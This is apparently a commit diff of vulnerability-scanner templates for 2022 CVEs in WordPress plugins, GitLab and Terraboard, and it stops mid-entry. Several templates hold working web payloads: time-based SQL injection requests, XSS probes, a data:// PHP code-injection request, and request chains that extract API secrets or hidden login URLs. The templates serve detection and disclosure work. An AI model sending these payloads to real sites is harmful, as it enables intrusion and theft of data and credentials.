author: Mr-xn author: Mr-xn
severity: critical severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.

View File

@ -1,11 +1,11 @@
id: CVE-2022-0147 id: CVE-2022-0147
info: info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
author: 8arthur author: 8arthur
severity: medium severity: medium
description: | description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference: reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1 - https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/ - https://wordpress.org/plugins/wp-gdpr-compliance/
@ -50,3 +50,5 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by md on 2022/12/08

View File

@ -1,11 +1,11 @@
id: CVE-2022-0346 id: CVE-2022-0346
info: info:
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
author: Akincibor author: Akincibor,theamanrawat
severity: medium severity: medium
description: | description: |
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
reference: reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6 - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/ - https://wordpress.org/plugins/www-xml-sitemap-generator-org/
@ -17,34 +17,27 @@ info:
cwe-id: CWE-79 cwe-id: CWE-79
metadata: metadata:
verified: "true" verified: "true"
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp' - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
stop-at-first-match: true stop-at-first-match: true
req-condition: true req-condition: true
matchers-condition: and
matchers: matchers:
- type: dsl - type: word
dsl: part: body_1
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')" words:
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')" - "<img src onerror=alert(document.domain)>"
condition: or - "Invalid Provider type specified"
condition: and
- type: word - type: word
part: header part: body_2
words: words:
- text/html - "2ef3baa95802a4b646f2fc29075efe34"
extractors: # Enhanced by md on 2022/12/09
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# Enhanced by md on 2022/09/08

View File

@ -0,0 +1,40 @@
id: CVE-2022-0349
info:
name: WordPress NotificationX <2.3.9 - SQL Injection
author: edoardottt
severity: critical
description: |
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
- https://wordpress.org/plugins/notificationx/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0349
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nx_id=sleep(6) -- x
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-0434 id: CVE-2022-0434
info: info:
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection name: WordPress Page Views Count <2.4.15 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15). WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference: reference:
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1 - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/ - https://wordpress.org/plugins/page-views-count/
@ -38,3 +38,5 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,100 @@
id: CVE-2022-0735
info:
name: GitLab CE/EE - Runner Registration Token Disclosure
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
reference:
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0735
cwe-id: CWE-863
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2022,gitlab
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors:
- type: regex
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'

View File

@ -1,11 +1,11 @@
id: CVE-2022-0785 id: CVE-2022-0785
info: info:
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection. WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
reference: reference:
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255 - https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/ - https://wordpress.org/plugins/daily-prayer-time-for-mosques/
@ -34,3 +34,5 @@ requests:
- 'contains(content_type, "text/html")' - 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")' - 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,33 @@
id: CVE-2022-0786
info:
name: KiviCare < 2.3.9 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
- https://wordpress.org/plugins/kivicare-clinic-management-system/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
classification:
cve-id: CVE-2022-0786
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Doctor details")'
condition: and

View File

@ -1,11 +1,11 @@
id: CVE-2022-0788 id: CVE-2022-0788
info: info:
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users. WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference: reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828 - https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/ - https://wordpress.org/plugins/wp-fundraising-donation/
@ -37,3 +37,5 @@ requests:
- 'contains(content_type, "application/json")' - 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")' - 'contains(body, "Invalid payment.")'
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-0817 id: CVE-2022-0817
info: info:
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection name: WordPress BadgeOS <=3.7.0 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users. WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference: reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e - https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/ - https://wordpress.org/plugins/badgeos/
@ -39,3 +39,5 @@ requests:
- 'contains(content_type, "application/json")' - 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")' - 'contains(body, "badgeos-arrange-buttons")'
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,39 @@
id: CVE-2022-0826
info:
name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
- https://wordpress.org/plugins/wp-video-gallery-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0826
cwe-id: CWE-89
metadata:
verified: true
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
requests:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Registred videos :")'
condition: and

View File

@ -1,11 +1,11 @@
id: CVE-2022-0867 id: CVE-2022-0867
info: info:
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi name: WordPress ARPrice <3.6.1 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users. WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference: reference:
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494 - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
- https://wordpress.org/plugins/arprice-responsive-pricing-table/ - https://wordpress.org/plugins/arprice-responsive-pricing-table/
@ -42,3 +42,5 @@ requests:
- 'contains(content_type_1, "text/html")' - 'contains(content_type_1, "text/html")'
- 'contains(body_2, "ArpPriceTable")' - 'contains(body_2, "ArpPriceTable")'
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -30,6 +30,7 @@ requests:
words: words:
- "PHP Extension" - "PHP Extension"
- "PHP Version" - "PHP Version"
- "<!DOCTYPE html"
condition: and condition: and
- type: status - type: status

View File

@ -0,0 +1,45 @@
id: CVE-2022-0948
info:
name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
- https://wordpress.org/plugins/woc-order-alert/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
- https://plugins.trac.wordpress.org/changeset/2707223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0948
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/olistener/new HTTP/1.1
Host: {{Hostname}}
content-type: application/json
{"id":" (SLEEP(6))#"}
- |
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(content_type_1, "application/json")'
- 'contains(body_2, "olistener-action.olistener-controller")'
condition: and

View File

@ -1,11 +1,11 @@
id: CVE-2022-1007 id: CVE-2022-1007
info: info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
author: 8arthur author: 8arthur
severity: medium severity: medium
description: | description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference: reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358 - https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/ - https://wordpress.org/plugins/advanced-booking-calendar/
@ -42,3 +42,5 @@ requests:
- "contains(all_headers_2, 'text/html')" - "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200" - "status_code_2 == 200"
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-1057 id: CVE-2022-1057
info: info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
author: theamanrawat author: theamanrawat
severity: critical severity: critical
description: | description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection. WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference: reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243 - https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/ - https://wordpress.org/plugins/pricing-deals-for-woocommerce/
@ -33,3 +33,5 @@ requests:
- 'status_code == 500' - 'status_code == 500'
- 'contains(body, "been a critical error")' - 'contains(body, "been a critical error")'
condition: and condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,43 @@
id: CVE-2022-1162
info:
name: GitLab CE/EE - Hardcoded password
author: GitLab Red Team
severity: critical
description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1162
cwe-id: CWE-798
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2022,gitlab
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
condition: or
extractors:
- type: regex
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'

View File

@ -0,0 +1,59 @@
id: CVE-2022-1442
info:
name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure
author: theamanrawat
severity: high
description: |
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
reference:
- https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
- https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b
- https://wordpress.org/plugins/metform/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1442
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1442
cwe-id: CWE-862
metadata:
google-dork: inurl:/wp-content/plugins/metform
verified: "true"
tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp
requests:
- raw:
- |
GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "mf_recaptcha_secret_key"
- "admin_email_from"
condition: and
- type: word
part: header_2
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
name: id
group: 1
regex:
- '<option value=\"([0-9]+)\"'
internal: true

View File

@ -0,0 +1,37 @@
id: CVE-2022-1595
info:
name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure
author: theamanrawat
severity: medium
description: |
The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.
reference:
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
classification:
cve-id: CVE-2022-1595
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
requests:
- raw:
- |
HEAD /wp-login.php HTTP/1.1
Host: {{Hostname}}
Cookie: valid_login_slug=1
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "Location: ([a-zA-Z0-9_.\\/-]+)"
- "wordpress_"
condition: and
- type: status
status:
- 302

View File

@ -0,0 +1,45 @@
id: CVE-2022-1883
info:
name: Terraboard <2.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
classification:
